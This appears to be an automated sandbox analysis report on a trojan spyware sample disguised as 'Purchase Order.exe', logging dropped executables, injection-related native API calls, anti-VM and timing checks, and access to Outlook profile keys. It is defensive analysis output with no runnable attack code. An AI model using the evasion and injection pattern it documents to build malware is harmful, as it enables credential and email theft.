Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_007007D6 NtOpenFile,	1_2_007007D6
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589540 NtReadFile,LdrInitializeThunk,	2_2_01589540
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01589910
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015895D0 NtClose,LdrInitializeThunk,	2_2_015895D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015899A0 NtCreateSection,LdrInitializeThunk,	2_2_015899A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589840 NtDelayExecution,LdrInitializeThunk,	2_2_01589840
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01589860
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015898F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_015898F0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01589710
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589FE0 NtCreateMutant,LdrInitializeThunk,	2_2_01589FE0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01589780
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015897A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_015897A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589A50 NtCreateFile,LdrInitializeThunk,	2_2_01589A50
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01589660
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01589A00
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589A20 NtResumeThread,LdrInitializeThunk,	2_2_01589A20
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015896E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_015896E0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589950 NtQueueApcThread,	2_2_01589950
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589560 NtWriteFile,	2_2_01589560
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0158AD30 NtSetContextThread,	2_2_0158AD30
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589520 NtWaitForSingleObject,	2_2_01589520
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015899D0 NtCreateProcessEx,	2_2_015899D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015895F0 NtQueryInformationFile,	2_2_015895F0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0158B040 NtSuspendThread,	2_2_0158B040
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589820 NtEnumerateKey,	2_2_01589820
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015898A0 NtWriteVirtualMemory,	2_2_015898A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0158A770 NtOpenThread,	2_2_0158A770
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589770 NtSetInformationFile,	2_2_01589770
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589760 NtOpenProcess,	2_2_01589760
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0158A710 NtOpenProcessToken,	2_2_0158A710
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589B00 NtSetValueKey,	2_2_01589B00
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589730 NtQueryVirtualMemory,	2_2_01589730
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0158A3B0 NtGetContextThread,	2_2_0158A3B0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589650 NtQueryValueKey,	2_2_01589650
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589670 NtQueryInformationProcess,	2_2_01589670
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589A10 NtQuerySection,	2_2_01589A10
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589610 NtEnumerateValueKey,	2_2_01589610
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015896D0 NtCreateKey,	2_2_015896D0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01589A80 NtOpenDirectoryObject,	2_2_01589A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529840 NtDelayExecution,LdrInitializeThunk,	16_2_04529840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529860 NtQuerySystemInformation,LdrInitializeThunk,	16_2_04529860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529540 NtReadFile,LdrInitializeThunk,	16_2_04529540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529560 NtWriteFile,LdrInitializeThunk,	16_2_04529560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk,	16_2_04529910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045295D0 NtClose,LdrInitializeThunk,	16_2_045295D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045299A0 NtCreateSection,LdrInitializeThunk,	16_2_045299A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529650 NtQueryValueKey,LdrInitializeThunk,	16_2_04529650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529A50 NtCreateFile,LdrInitializeThunk,	16_2_04529A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529660 NtAllocateVirtualMemory,LdrInitializeThunk,	16_2_04529660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529610 NtEnumerateValueKey,LdrInitializeThunk,	16_2_04529610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045296D0 NtCreateKey,LdrInitializeThunk,	16_2_045296D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk,	16_2_045296E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529710 NtQueryInformationToken,LdrInitializeThunk,	16_2_04529710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529FE0 NtCreateMutant,LdrInitializeThunk,	16_2_04529FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529780 NtMapViewOfSection,LdrInitializeThunk,	16_2_04529780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0452B040 NtSuspendThread,	16_2_0452B040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529820 NtEnumerateKey,	16_2_04529820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045298F0 NtReadVirtualMemory,	16_2_045298F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045298A0 NtWriteVirtualMemory,	16_2_045298A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529950 NtQueueApcThread,	16_2_04529950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0452AD30 NtSetContextThread,	16_2_0452AD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529520 NtWaitForSingleObject,	16_2_04529520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045299D0 NtCreateProcessEx,	16_2_045299D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045295F0 NtQueryInformationFile,	16_2_045295F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529670 NtQueryInformationProcess,	16_2_04529670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529A10 NtQuerySection,	16_2_04529A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529A00 NtProtectVirtualMemory,	16_2_04529A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529A20 NtResumeThread,	16_2_04529A20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529A80 NtOpenDirectoryObject,	16_2_04529A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529770 NtSetInformationFile,	16_2_04529770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0452A770 NtOpenThread,	16_2_0452A770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529760 NtOpenProcess,	16_2_04529760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0452A710 NtOpenProcessToken,	16_2_0452A710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529B00 NtSetValueKey,	16_2_04529B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04529730 NtQueryVirtualMemory,	16_2_04529730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0452A3B0 NtGetContextThread,	16_2_0452A3B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045297A0 NtUnmapViewOfSection,	16_2_045297A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC870 NtClose,	16_2_003EC870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC840 NtDeleteFile,	16_2_003EC840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC920 NtAllocateVirtualMemory,	16_2_003EC920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC740 NtCreateFile,	16_2_003EC740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC7F0 NtReadFile,	16_2_003EC7F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC83A NtReadFile,NtDeleteFile,	16_2_003EC83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC86A NtClose,	16_2_003EC86A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC91A NtAllocateVirtualMemory,	16_2_003EC91A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EC7EB NtReadFile,	16_2_003EC7EB

Source: EEF0.tmp.1.dr

Static PE information: No import functions for PE file found

Source: EEF0.tmp.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: EEF0.tmp.1.dr

Static PE information: Section .text

Source: Purchase Order.exe	Virustotal: Detection: 44%
Source: Purchase Order.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\Purchase Order.exe

File read: C:\Users\user\Desktop\Purchase Order.exe

Jump to behavior

Source: Purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order.exe C:\Users\user\Desktop\Purchase Order.exe
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process created: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 492
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process created: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

0_2_0040352D

Source: C:\Users\user\Desktop\Purchase Order.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsbED89.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/9@16/17

Source: C:\Users\user\Desktop\Purchase Order.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\Purchase Order.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040498A

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4444

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: sphybwtjm.exe, 00000001.00000003.251841903.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, sphybwtjm.exe, 00000001.00000003.252365334.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.255530545.0000000001382000.00000004.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.254208029.00000000011E4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.350115654.0000000004329000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.347901130.000000000418E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: sphybwtjm.exe, sphybwtjm.exe, 00000002.00000002.349936877.000000000163F000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.255530545.0000000001382000.00000004.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000002.348530931.0000000001520000.00000040.00000800.00020000.00000000.sdmp, sphybwtjm.exe, 00000002.00000003.254208029.00000000011E4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.780873757.00000000045DF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.779024693.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.350115654.0000000004329000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.347901130.000000000418E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: sphybwtjm.exe, 00000002.00000002.350917001.00000000033E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: sphybwtjm.exe, 00000002.00000002.350917001.00000000033E0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0159D0D1 push ecx; ret	2_2_0159D0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0453D0D1 push ecx; ret	16_2_0453D0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EF935 push eax; ret	16_2_003EF988
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EF98B push eax; ret	16_2_003EF9F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EF982 push eax; ret	16_2_003EF988
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003EF9EC push eax; ret	16_2_003EF9F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D4253 pushad ; iretd	16_2_003D4254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D4245 push ebp; ret	16_2_003D424D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D3C5C push edi; retf	16_2_003D3C5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003E86A6 pushad ; iretd	16_2_003E86C1

Source: initial sample

Static PE information: section name: .text entropy: 7.9982807875367605

Source: C:\Users\user\Desktop\Purchase Order.exe	File created: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	File created: C:\Users\user\AppData\Local\Temp\EEF0.tmp			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EEF0.TMP

Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\explorer.exe TID: 5040

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EEF0.tmp

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Code function: 2_2_01586DE6 rdtsc

2_2_01586DE6

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

API coverage: 5.3 %

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003E2C80 FindFirstFileW,FindNextFileW,FindClose,	16_2_003E2C80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003E2C7A FindFirstFileW,FindNextFileW,FindClose,	16_2_003E2C7A

Source: C:\Users\user\Desktop\Purchase Order.exe

API call chain: ExitProcess graph end node

graph_0-3385

Source: explorer.exe, 00000005.00000000.274731531.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.275074163.0000000007B66000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000005.00000000.275346620.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.287080056.000000000F240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Data
Source: explorer.exe, 00000005.00000000.287080056.000000000F240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n1
Source: explorer.exe, 00000005.00000000.329287466.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.287080056.000000000F240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA'
Source: explorer.exe, 00000005.00000000.275346620.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000005.00000000.266456889.0000000005F12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Code function: 2_2_01586DE6 rdtsc

2_2_01586DE6

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_00A311A0 mov eax, dword ptr fs:[00000030h]	1_2_00A311A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_0070007A mov eax, dword ptr fs:[00000030h]	1_2_0070007A
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_00700019 mov eax, dword ptr fs:[00000030h]	1_2_00700019
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_00700005 mov eax, dword ptr fs:[00000030h]	1_2_00700005
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_00700149 mov eax, dword ptr fs:[00000030h]	1_2_00700149
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_00A311A0 mov eax, dword ptr fs:[00000030h]	2_2_00A311A0
